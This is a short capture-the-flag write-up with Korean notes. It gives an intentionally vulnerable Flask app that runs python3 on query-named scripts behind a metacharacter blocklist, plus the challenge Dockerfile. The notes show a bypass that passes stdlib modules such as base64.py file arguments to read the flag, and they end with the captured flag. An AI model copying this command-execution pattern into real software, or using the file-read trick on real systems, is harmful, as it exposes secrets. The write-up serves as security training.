from flask import Flask, request
import os
import subprocess

app = Flask(__name__)
app.secret_key = os.urandom(32)

@app.route("/", methods=["GET"])
def index():
    cmd = ['python3'] + list(request.args.keys())
    cmd[1] += '.py'
    
    filter_codes = ['`', '$', '<', '>', '|', '&', '{', '}', '=', '*', '?', '!', ';', '"', ',', '\\n']
    for filter_code in filter_codes:
        for arg in cmd:
            if filter_code in arg:
                return 'No hack _(:3)J'
    
    if os.path.exists(cmd[1]) == False:
        return 'No such file _(:3)J'
    
    response = subprocess.run(
        cmd, capture_output=True, text=True
    )
    return response.stdout

app.run(host="0.0.0.0", port=9000)

.py suffix bypass 필요하고, flag.txt를 읽어야함

예를 들어, 위와 같이 app.py를 읽을 수 있음.

FROM python:3.11-slim

RUN apt update && apt install -y git
RUN apt-get update -y && apt-get install -y python3-pip build-essential

RUN pip install --upgrade pip

COPY . /app
WORKDIR /app

RUN echo "DH{this_is_not_real_flag}" > flag
RUN pip install -r requirements.txt

EXPOSE 9000

CMD ["python3", "app.py"]

위에가 Dockerfile이기 때문임.

또 다른 lib 읽을 수 있는지 찾아봄 (python3 /lib/python3.11/base64.py -e /app/flag)

cmd[1] 은 base64.py가 될꺼고, subprocess.run(python3 base64.py -e /app/flag) 를 할 수 있게 됨

DH{there_is_/lib/python3.11/timeit.py}